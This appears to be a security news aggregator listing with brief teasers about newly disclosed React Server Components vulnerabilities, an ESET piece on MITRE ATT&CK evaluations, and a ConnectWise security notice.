New Vulnerabilities in React Server Components Allow DoS Attacks and Source Code Leaks Less than a week after addressing a critical Remote Code Execution (RCE) vulnerability, the React team has disclosed three additional security flaws affecting React Server Components (RSC). Security researchers discovered these new issues while attempting to bypass the mitigations for the previous…
-
Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece
Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience. Go to eset
-
TR-25-0449 (ConnectWise Security Notice)
TR-25-0449 (ConnectWise Security Notice) Go to usom.gov